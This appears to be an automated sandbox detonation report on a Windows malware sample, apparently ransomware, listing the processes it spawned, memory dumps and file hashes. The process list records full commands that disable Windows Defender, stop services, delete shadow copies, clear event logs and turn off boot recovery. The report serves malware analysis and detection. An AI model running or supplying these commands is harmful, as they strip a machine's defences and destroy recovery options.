| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe
"C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe"
C:\Windows\system32\net.exe
net.exe stop "NetMsmqActivator" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "NetMsmqActivator" /y
C:\Windows\system32\net.exe
net.exe stop "SamSs" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SamSs" /y
C:\Windows\system32\net.exe
net.exe stop "SDRSVC" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SDRSVC" /y
C:\Windows\system32\net.exe
net.exe stop "SstpSvc" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SstpSvc" /y
C:\Windows\system32\net.exe
net.exe stop "UI0Detect" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UI0Detect" /y
C:\Windows\system32\net.exe
net.exe stop "VSS" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VSS" /y
C:\Windows\system32\net.exe
net.exe stop "wbengine" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "wbengine" /y
C:\Windows\system32\net.exe
net.exe stop "WebClient" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "WebClient" /y
C:\Windows\system32\sc.exe
sc.exe config "NetMsmqActivator" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SamSs" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SDRSVC" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SstpSvc" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "UI0Detect" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "VSS" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "wbengine" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "WebClient" start= disabled
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl system
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl security
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl application
C:\Windows\System32\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\System32\Wbem\wmic.exe
wmic.exe shadowcopy delete
C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled no
C:\Windows\system32\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Windows\system32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\system32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\SyncClear.txt
Network
Files
memory/588-54-0x0000000000000000-mapping.dmp
memory/556-55-0x0000000000000000-mapping.dmp
memory/872-56-0x0000000000000000-mapping.dmp
memory/1436-57-0x0000000000000000-mapping.dmp
memory/1644-58-0x0000000000000000-mapping.dmp
memory/640-59-0x0000000000000000-mapping.dmp
memory/692-60-0x0000000000000000-mapping.dmp
memory/1440-61-0x0000000000000000-mapping.dmp
memory/1544-62-0x0000000000000000-mapping.dmp
memory/1156-63-0x0000000000000000-mapping.dmp
memory/1100-64-0x0000000000000000-mapping.dmp
memory/1060-65-0x0000000000000000-mapping.dmp
memory/1280-66-0x0000000000000000-mapping.dmp
memory/1496-67-0x0000000000000000-mapping.dmp
memory/1172-68-0x0000000000000000-mapping.dmp
memory/1632-69-0x0000000000000000-mapping.dmp
memory/1136-70-0x0000000000000000-mapping.dmp
memory/1624-71-0x0000000000000000-mapping.dmp
memory/1404-72-0x0000000000000000-mapping.dmp
memory/1684-73-0x0000000000000000-mapping.dmp
memory/1688-74-0x0000000000000000-mapping.dmp
memory/1292-75-0x0000000000000000-mapping.dmp
memory/1776-76-0x0000000000000000-mapping.dmp
memory/1932-77-0x0000000000000000-mapping.dmp
memory/1964-78-0x0000000000000000-mapping.dmp
memory/332-79-0x0000000000000000-mapping.dmp
memory/1204-80-0x0000000000000000-mapping.dmp
memory/1244-81-0x0000000000000000-mapping.dmp
memory/892-82-0x0000000000000000-mapping.dmp
memory/984-83-0x0000000000000000-mapping.dmp
memory/1060-84-0x0000000000000000-mapping.dmp
memory/1884-85-0x0000000000000000-mapping.dmp
memory/1160-86-0x0000000000000000-mapping.dmp
memory/1020-87-0x0000000000000000-mapping.dmp
memory/1996-88-0x0000000000000000-mapping.dmp
memory/1328-89-0x0000000000000000-mapping.dmp
memory/1904-90-0x0000000000000000-mapping.dmp
memory/1416-91-0x0000000000000000-mapping.dmp
memory/1092-92-0x0000000000000000-mapping.dmp
memory/900-93-0x0000000000000000-mapping.dmp
memory/1720-94-0x0000000000000000-mapping.dmp
memory/836-95-0x0000000000000000-mapping.dmp
memory/436-96-0x0000000000000000-mapping.dmp
memory/876-97-0x0000000000000000-mapping.dmp
memory/1116-98-0x0000000000000000-mapping.dmp
memory/1016-99-0x0000000000000000-mapping.dmp
memory/1772-100-0x0000000000000000-mapping.dmp
memory/1936-101-0x0000000000000000-mapping.dmp
memory/1908-102-0x0000000000000000-mapping.dmp
memory/1744-103-0x0000000000000000-mapping.dmp
memory/1032-104-0x0000000000000000-mapping.dmp
memory/1976-105-0x0000000000000000-mapping.dmp
memory/676-106-0x0000000000000000-mapping.dmp
memory/1672-107-0x0000000000000000-mapping.dmp
memory/2020-108-0x0000000000000000-mapping.dmp
memory/1764-109-0x0000000000000000-mapping.dmp
memory/908-110-0x0000000000000000-mapping.dmp
memory/1124-111-0x0000000000000000-mapping.dmp
memory/1836-112-0x0000000000000000-mapping.dmp
memory/1836-113-0x000007FEFB591000-0x000007FEFB593000-memory.dmp
memory/1780-114-0x0000000000000000-mapping.dmp
memory/1792-116-0x0000000000000000-mapping.dmp
memory/1520-118-0x0000000000000000-mapping.dmp
memory/1104-119-0x0000000000000000-mapping.dmp
memory/2064-120-0x0000000000000000-mapping.dmp
memory/2160-123-0x0000000002520000-0x0000000002522000-memory.dmp
memory/2160-124-0x0000000002522000-0x0000000002524000-memory.dmp
memory/2160-125-0x0000000002524000-0x0000000002527000-memory.dmp
memory/2160-122-0x000007FEF2660000-0x000007FEF31BD000-memory.dmp
memory/2160-126-0x000000000252B000-0x000000000254A000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 9ad30b90d95b927865dcb9b5f08378f4 |
| SHA1 | fbef6c732e0bee170b0bdb364a9067d0f1bd7432 |
| SHA256 | b0ee39302e0fb658a806cbef819b6e3a3334cd15220993a8865380ebcef47b2f |
| SHA512 | 78e2834d7494f289a371ae01ddf7d794a506748f718e6d0b678a4cf24496246fe92c6dcce12c3b9c5df5c4c55aabc91e2a7ec57109a85a529a8477223c0bf40d |
memory/2248-129-0x000007FEF1CC0000-0x000007FEF281D000-memory.dmp
memory/2248-130-0x0000000002460000-0x0000000002462000-memory.dmp
memory/2248-131-0x0000000002462000-0x0000000002464000-memory.dmp
memory/2248-132-0x0000000002464000-0x0000000002467000-memory.dmp
memory/2248-133-0x000000000246B000-0x000000000248A000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2022-01-12 14:10
Reported
2022-01-12 14:12
Platform
win10-en-20211208
Max time kernel
5s
Max time network
130s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe
"C:\Users\Admin\AppData\Local\Temp\a33e93343f46eafa16ccd18a9376f528e146de57673d9fad0a6ce68130cd9357.bin.sample.exe"